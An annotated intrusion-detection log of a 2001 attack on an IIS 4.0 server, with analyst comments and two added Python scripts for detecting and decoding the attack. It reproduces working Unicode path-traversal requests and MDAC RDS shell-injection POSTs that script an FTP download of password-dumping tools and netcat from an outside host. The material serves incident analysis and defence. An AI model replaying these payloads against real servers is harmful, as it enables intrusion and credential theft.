!@# Apologies in advance for the typos.
!@#
!@#
[**] Outbound http Response [**]
02/04-05:25:14.555344 172.16.1.106:80 -> 213.116.251.162:1764
TCP TTL:127 TOS:0x0 ID:54134 IpLen:20 DgmLen:267 DF
***AP*** Seq: 0x2CAE8C2F Ack: 0x8E35E9AE Win: 0x20AE TcpLen: 20
HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Sun, 04 Feb 20
01 12:24:10 GMT..Content-Type: text/html..Set-Cookie: ASPSESSION
IDGQQGGQZK=KPGNFIPAKMIDBOCJNGOAAHBD; path=/..Cache-control: priv
ate..Transfer-Encoding: chunked....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# First breach, gets listing of boot.ini
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:25:22.525676 213.116.251.162:1765 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11031 IpLen:20 DgmLen:496 DF
***AP*** Seq: 0x8E406992 Ack: 0x2CAE9E9B Win: 0x2238 TcpLen: 20
GET /guest/default.asp/....../....../..%AF../..%C0%AF../boot.ini
HTTP/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image
/pjpeg, application/vnd.ms-excel, application/msword, applicatio
n/vnd.ms-powerpoint, */*..Accept-Language: en-us..Accept-Encodin
g: gzip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01
; Windows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connectio
n: Keep-Alive..Cookie: ASPSESSIONIDGQQGGQZK=KPGNFIPAKMIDBOCJNGOA
AHBD....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
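The request above reaches boot.ini because %C0%AF is an overlong two-byte UTF-8 encoding of '/', which a strict decoder must reject but which the server accepted after its path checks had already run. The following Python is an added example (not part of the original log or the analyst's notes) that a defender can run over request paths to flag overlong sequences and to show how a naive "../" check misses the traversal while a check on the decoded path catches it. The sample paths are constructed from the log above; the lenient decoder is a detection model, not a claim about the exact algorithm the server used.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed samples: the request path from the Unicode alert above, and a benign path.
TRAVERSAL_PATH = "/guest/default.asp/....../....../..%AF../..%C0%AF../boot.ini"
BENIGN_PATH = "/guest/default.asp?id=%20test"


def find_overlong_utf8(path: str) -> list:
    """Return (offset, hex, char) for every 2-byte sequence with lead byte 0xC0 or 0xC1.
    Those lead bytes can only produce overlong encodings of 7-bit ASCII (C0 AF is '/'),
    so a strict UTF-8 decoder rejects them; their presence in a URL is a strong signal."""
    raw = unquote_to_bytes(path)
    hits = []
    i = 0
    while i + 1 < len(raw):
        b0, b1 = raw[i], raw[i + 1]
        if b0 in (0xC0, 0xC1) and 0x80 <= b1 <= 0xBF:
            cp = ((b0 & 0x1F) << 6) | (b1 & 0x3F)
            hits.append((i, f"{b0:02X}{b1:02X}", chr(cp)))
            i += 2
        else:
            i += 1
    return hits


def is_strict_utf8(path: str) -> bool:
    """True only if the percent-decoded bytes are well-formed UTF-8 (no overlong forms,
    no stray continuation bytes such as the lone %AF in the sample)."""
    try:
        unquote_to_bytes(path).decode("utf-8")
        return True
    except UnicodeDecodeError:
        return False


def lenient_decode(path: str) -> str:
    """Model of a lenient decoder: overlong 2-byte sequences become the ASCII character
    they encode, 7-bit bytes pass through, anything else becomes U+FFFD."""
    raw = unquote_to_bytes(path)
    out = []
    i = 0
    while i < len(raw):
        b0 = raw[i]
        if b0 in (0xC0, 0xC1) and i + 1 < len(raw) and 0x80 <= raw[i + 1] <= 0xBF:
            out.append(chr(((b0 & 0x1F) << 6) | (raw[i + 1] & 0x3F)))
            i += 2
        elif b0 < 0x80:
            out.append(chr(b0))
            i += 1
        else:
            out.append("\ufffd")
            i += 1
    return "".join(out)


def has_dotdot_segment(path: str) -> bool:
    """True if any path segment (split on '/' or '\\') is exactly '..'."""
    return any(seg == ".." for seg in re.split(r"[/\\]", path))


def assess_request_path(path: str) -> dict:
    """Combine the checks: the raw string looks harmless, the decoded one does not."""
    decoded = lenient_decode(path)
    return {
        "overlong": find_overlong_utf8(path),
        "strict_utf8": is_strict_utf8(path),
        "raw_traversal": has_dotdot_segment(path),
        "decoded_traversal": has_dotdot_segment(decoded),
        "decoded": decoded,
    }


if __name__ == "__main__":
    for p in (TRAVERSAL_PATH, BENIGN_PATH):
        print(p, "->", assess_request_path(p))
```

The defensive lesson is ordering: decode (rejecting overlong and malformed sequences) before any path or authorization check, never after it; a front-end rule that only looks for a literal "../" in the raw request line would have passed this request.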
!@# Need the following segments to see the response body
[**] Outbound http Response [**]
02/04-05:25:22.559828 172.16.1.106:80 -> 213.116.251.162:1765
TCP TTL:127 TOS:0x0 ID:58998 IpLen:20 DgmLen:200 DF
***AP*** Seq: 0x2CAE9E9B Ack: 0x8E406B5A Win: 0x1DD4 TcpLen: 20
HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Sun, 04 Feb 20
01 12:24:18 GMT..Content-Type: text/html..Cache-control: private
..Transfer-Encoding: chunked....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Failed attempt to list contents of /mdac/ directory
[**] Outbound http Response [**]
02/04-05:26:35.937245 172.16.1.106:80 -> 213.116.251.162:1769
TCP TTL:127 TOS:0x0 ID:62326 IpLen:20 DgmLen:374 DF
***AP*** Seq: 0x2CAFCE0E Ack: 0x8F72C638 Win: 0x20A5 TcpLen: 20
HTTP/1.1 403 Access Forbidden..Server: Microsoft-IIS/4.0..Date:
Sun, 04 Feb 2001 12:25:31 GMT..Connection: close..Content-Type:
text/html..Content-Length: 172....
Directory L
isting Denied.Directory Listing Denied<
/h1>This Virtual Directory does not allow contents to be listed.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# First use of the MDAC RDS vulnerability to append 'werd' to the file 'c:\fun'. Likely just testing the exploit.
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:27:08.159193 213.116.251.162:1771 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11060 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0x8FEE9575 Ack: 0x2CB04B6E Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .w.e.r.d. .>.>. .c.:.\.f.u.n.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
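The RDS client sends its query argument as UTF-16LE, and Snort's character dump prints every non-printable byte (here the 0x00 high byte of each ASCII character) as '.', which is why the body reads "S.e.l.e.c.t". The following Python is an added example, not code from the original log or its author, that undoes Snort's 64-column wrapping, recovers the query by keeping every other character of the UTF-16 region, and pulls out the two things an incident responder wants from each of these POSTs: the command passed to shell() and the .mdb path the attacker drove the Jet engine with. It assumes the argument is ASCII-range text, which holds for every POST in this log; the sample alert is the first MDAC POST above, embedded as constructed input.

```python
import re

# Constructed sample: the first msadcs.dll POST from the log above, as Snort wrapped it.
SAMPLE_ALERT = r"""POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .w.e.r.d. .>.>. .c.:.\.f.u.n.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
."""


def rejoin_snort_dump(dump: str) -> str:
    """Snort wraps the character dump at 64 columns without inserting separators,
    so concatenating the lines restores the original byte order."""
    return "".join(dump.splitlines())


def decode_utf16_dump(segment: str) -> str:
    """In a character dump of UTF-16LE ASCII text every code unit is 'X' followed by
    a null printed as '.', so the original text is every other character."""
    return segment[::2]


def extract_rds_query(dump: str) -> dict:
    """Locate the multipart body of an RDS POST and decode its query argument."""
    text = rejoin_snort_dump(dump)
    m = re.search(r"boundary=([^;\s]+)", text)
    if not m:
        raise ValueError("no MIME boundary in alert")
    boundary = m.group(1)
    body_start = text.index("--" + boundary)          # opening delimiter
    body_end = text.index("--" + boundary + "--")     # closing delimiter (ASCII, not UTF-16)
    body = text[body_start:body_end]
    # The UTF-16 argument starts at the first "letter.letter.letter" run after the part header.
    start = re.search(r"[A-Za-z]\.[A-Za-z]\.[A-Za-z]", body)
    if not start:
        raise ValueError("no UTF-16 argument found")
    query = decode_utf16_dump(body[start.start():])
    cmd = re.search(r'shell\("(.*?)"\)', query)
    dbq = re.search(r"dbq=([^;]+)", query)
    return {
        "query": query,
        "shell_command": cmd.group(1) if cmd else None,
        "dbq": dbq.group(1) if dbq else None,
        # The '|shell(' construct is the Jet VBA shell() call that makes this RDS query a command execution.
        "shell_injection": "|shell(" in query.lower(),
    }


if __name__ == "__main__":
    result = extract_rds_query(SAMPLE_ALERT)
    print("command :", result["shell_command"])
    print("database:", result["dbq"])
```

Run over every msadcs.dll alert in a capture, the shell_command values give a command-by-command timeline of what was executed on the web server, which is the basis for the host-side triage (which files were written, which outbound connections were attempted) that follows.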
!@# Uses Unicode exploit to check contents of file
[**] Resrticted http-iis-unicode-binary [**]
02/04-05:27:15.708044 213.116.251.162:1772 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11071 IpLen:20 DgmLen:491 DF
***AP*** Seq: 0x900CDB75 Ack: 0x2CB0698D Win: 0x2238 TcpLen: 20
GET /guest/default.asp/....../....../..%AF../..%C0%AF../fun HTTP
/1.1..Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpe
g, application/vnd.ms-excel, application/msword, application/vnd
.ms-powerpoint, */*..Accept-Language: en-us..Accept-Encoding: gz
ip, deflate..User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Win
dows NT 5.0; Hotbar 2.0)..Host: lab.wiretrip.net..Connection: Ke
ep-Alive..Cookie: ASPSESSIONIDGQQGGQZK=KPGNFIPAKMIDBOCJNGOAAHBD.
...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Unicode exploit is confirmed
!@# Need the following segments to see the response body
[**] Outbound http Response [**]
02/04-05:27:15.714436 172.16.1.106:80 -> 213.116.251.162:1772
TCP TTL:127 TOS:0x0 ID:1911 IpLen:20 DgmLen:200 DF
***AP*** Seq: 0x2CB0698D Ack: 0x900CDD38 Win: 0x2075 TcpLen: 20
HTTP/1.1 200 OK..Server: Microsoft-IIS/4.0..Date: Sun, 04 Feb 20
01 12:26:11 GMT..Content-Type: text/html..Cache-control: private
..Transfer-Encoding: chunked....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC exploit to create an FTP script file to download toolkit
!@# Toolkit is (samdump.dll, pdump.exe and nc.exe)
!@# nc.exe is version 1.10 (you can see the version string in the FTP data stream later on)
!@# Judging from the size of pdump.exe in the FTP control channel traffic, this looks like
!@# pwdump2.exe (32,768 bytes). This is supported by the size of samdump.dll (36,864 bytes)
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:32:51.574859 213.116.251.162:1778 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11126 IpLen:20 DgmLen:759 DF
***AP*** Seq: 0x951052A9 Ack: 0x2CB58902 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 565..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 356..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .u.s.e.r. .j.o.h.n.a.2.k. .>. .f.t.p.c.o.m.".).|.'......
.d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r.
.(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h
.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!
YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:32:58.852572 213.116.251.162:1780 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11140 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0x952D922A Ack: 0x2CB5A5D6 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .h.a.c.k.e.r.2.0.0.0. .>.>. .f.t.p.c.o.m.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:05.873985 213.116.251.162:1782 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11151 IpLen:20 DgmLen:767 DF
***AP*** Seq: 0x9549C836 Ack: 0x2CB5C142 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 573..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 364..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .s.a.m.d.u.m.p...d.l.l. .>.>. .f.t.p.c.o.m.".).|
.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i
.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i
.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!
ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:12.881418 213.116.251.162:1784 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11162 IpLen:20 DgmLen:763 DF
***AP*** Seq: 0x95669396 Ack: 0x2CB5DCAE Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 569..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 360..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .p.d.u.m.p...e.x.e. .>.>. .f.t.p.c.o.m.".).|.'..
.....d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e
.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s
.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!
ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:19.823370 213.116.251.162:1786 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11173 IpLen:20 DgmLen:757 DF
***AP*** Seq: 0x95826381 Ack: 0x2CB5F7D4 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 563..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 354..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .g.e.t. .n.c...e.x.e. .>.>. .f.t.p.c.o.m.".).|.'.......d
.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(
.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t
.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YO
UR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:26.809677 213.116.251.162:1789 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11189 IpLen:20 DgmLen:745 DF
***AP*** Seq: 0x959EB0E1 Ack: 0x2CB61304 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 551..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 342..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .e
.c.h.o. .q.u.i.t. .>.>. .f.t.p.c.o.m.".).|.'.......d.r.i.v.e.r.=
.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r.i.v.e.r. .(.*...m.d.b.)
.}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\.i.i.s.\.h.t.m.\.t.u.t.o
.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...--!ADM!ROX!YOUR!WORLD!--.
.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# Uses MDAC vulnerability to open scripted ftp session to www.nether.net
!@# Uses -n switch to suppress auto-login
[**] WEB-IIS msadc/msadcs.dll access [**]
02/04-05:33:33.995519 213.116.251.162:1791 -> 172.16.1.106:80
TCP TTL:111 TOS:0x0 ID:11203 IpLen:20 DgmLen:769 DF
***AP*** Seq: 0x95BB80F0 Ack: 0x2CB62EE9 Win: 0x2238 TcpLen: 20
POST /msadc/msadcs.dll/AdvancedDataFactory.Query HTTP/1.1..User-
Agent: ACTIVEDATA..Host: lab.wiretrip.net..Content-Length: 575..
Connection: Keep-Alive....ADCClientVersion:01.06..Content-Type:
multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=3....--
!ADM!ROX!YOUR!WORLD!..Content-Type: application/x-varg..Content-
Length: 366..............S.e.l.e.c.t. .*. .f.r.o.m. .C.u.s.t.o.m
.e.r.s. .w.h.e.r.e. .C.i.t.y.=.'.|.s.h.e.l.l.(.".c.m.d. ./.c. .f
.t.p. .-.s.:.f.t.p.c.o.m. .-.n. .w.w.w...n.e.t.h.e.r...n.e.t.".)
.|.'.......d.r.i.v.e.r.=.{.M.i.c.r.o.s.o.f.t. .A.c.c.e.s.s. .D.r
.i.v.e.r. .(.*...m.d.b.).}.;.d.b.q.=.c.:.\.w.i.n.n.t.\.h.e.l.p.\
.i.i.s.\.h.t.m.\.t.u.t.o.r.i.a.l.\.b.t.c.u.s.t.m.r...m.d.b.;...-
-!ADM!ROX!YOUR!WORLD!--..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:34.938125 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44707 IpLen:20 DgmLen:94 DF
***AP*** Seq: 0x2D782DB2 Ack: 0x2CB633DA Win: 0x832C TcpLen: 20
220 freenet.nether.net FTP server (SunOS 5.7) ready...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:34.944019 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:31863 IpLen:20 DgmLen:54 DF
***AP*** Seq: 0x2CB633DA Ack: 0x2D782DE8 Win: 0x2202 TcpLen: 20
USER johna2k..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.005368 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44709 IpLen:20 DgmLen:76 DF
***AP*** Seq: 0x2D782DE8 Ack: 0x2CB633E8 Win: 0x832C TcpLen: 20
331 Password required for johna2k...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.034552 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:32119 IpLen:20 DgmLen:57 DF
***AP*** Seq: 0x2CB633E8 Ack: 0x2D782E0C Win: 0x21DE TcpLen: 20
PASS hacker2000..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
!@# FTP login fails; the intruder probably cannot see this.
[**] FTP control channel [**]
02/04-05:33:35.082277 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44710 IpLen:20 DgmLen:62 DF
***AP*** Seq: 0x2D782E0C Ack: 0x2CB633F9 Win: 0x832C TcpLen: 20
530 Login incorrect...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.089514 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:32375 IpLen:20 DgmLen:65 DF
***AP*** Seq: 0x2CB633F9 Ack: 0x2D782E22 Win: 0x21C8 TcpLen: 20
PORT 172,16,1,106,12,64..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.144118 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44711 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x2D782E22 Ack: 0x2CB63412 Win: 0x832C TcpLen: 20
530 Please login with USER and PASS...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.149295 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:32631 IpLen:20 DgmLen:58 DF
***AP*** Seq: 0x2CB63412 Ack: 0x2D782E48 Win: 0x21A2 TcpLen: 20
RETR samdump.dll..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.202201 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44712 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x2D782E48 Ack: 0x2CB63424 Win: 0x832C TcpLen: 20
530 Please login with USER and PASS...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.208941 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:32887 IpLen:20 DgmLen:56 DF
***AP*** Seq: 0x2CB63424 Ack: 0x2D782E6E Win: 0x217C TcpLen: 20
RETR pdump.exe..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.255965 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44713 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x2D782E6E Ack: 0x2CB63434 Win: 0x832C TcpLen: 20
530 Please login with USER and PASS...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.262909 172.16.1.106:3135 -> 204.42.253.18:21
TCP TTL:127 TOS:0x0 ID:33143 IpLen:20 DgmLen:53 DF
***AP*** Seq: 0x2CB63434 Ack: 0x2D782E94 Win: 0x2156 TcpLen: 20
RETR nc.exe..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] FTP control channel [**]
02/04-05:33:35.314214 204.42.253.18:21 -> 172.16.1.106:3135
TCP TTL:242 TOS:0x0 ID:44714 IpLen:20 DgmLen:78 DF
***AP*** Seq: 0x2D782E94 Ack: 0x2CB63441 Win: 0x832C TcpLen: 20
530 Please login with USER and PASS...
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
